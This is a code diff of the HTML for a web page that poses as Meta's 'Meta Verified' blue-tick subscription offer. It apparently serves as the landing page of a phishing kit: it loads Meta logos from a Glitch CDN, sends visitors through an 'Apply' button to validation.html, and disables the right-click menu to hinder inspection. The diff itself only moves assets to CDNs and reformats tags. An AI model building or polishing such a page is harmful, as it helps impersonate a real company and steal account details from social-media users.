--- a/index.html
+++ b/index.html
@@ -1,8 +1,13 @@
-<!DOCTYPE html><html lang="en"><head>
+<!DOCTYPE html>
+
+
+<html lang="en">
+
+<head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Meta Verified | Get a verified blue tick</title>
-    <link href="bootstrap.min.css" rel="stylesheet">
+    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
     <style>
         /* CSS styles */
 
@@ -104,15 +109,15 @@
 <body>
     <div class="container-fluid">
         <div class="container">
-            <img src="meta-logo-QVrNRj93.svg" alt="logo" class="logo">
+            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/meta-logo-QVrNRj93.svg?v=1723987211189" alt="logo" class="logo">
         </div>
     </div>
     <div class="content">
         <div class="col-sm-6">
-            <img src="blue_tick-B9ADAlwo.png" alt="meta" class="meta-logo">
+            <img src="https://cdn.glitch.global/325f7535-a68d-4687-a91c-1e7d9366104a/blue_tick-B9ADAlwo.png?v=1723987162846" alt="meta" class="meta-logo">
             <h1 class="my-3 fs-1">Stand out with Meta<br> Verified</h1>
             <div style="margin-bottom: 30px;"></div>
-            <a class="btn" href="validation.html">Apply</a>
+            <a class='btn' href='validation.html'>Apply</a>
             <p class="mt-4">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
             <p class="sign-up">Sign up now for creators</p>
             <p class="mt-4 mb-0">
@@ -121,9 +126,9 @@
             <a href="#" class="business-info">Meta verified for businesses</a>
             <p class="mt-4 font-italic region-info">Features, availability, and pricing may vary by region.</p>
         </div>
-        <div class="col-sm-5 image" style="background-image: url('background.png'); "></div>
+        <div class="col-sm-5 image" style="background-image: url('./background.png'); "></div>
     </div>
-
+</body>
 <script>
     document.addEventListener('contextmenu', event => {
         event.preventDefault();
@@ -136,4 +141,4 @@
     });
 </script>
 
-</body></html>
+</html>
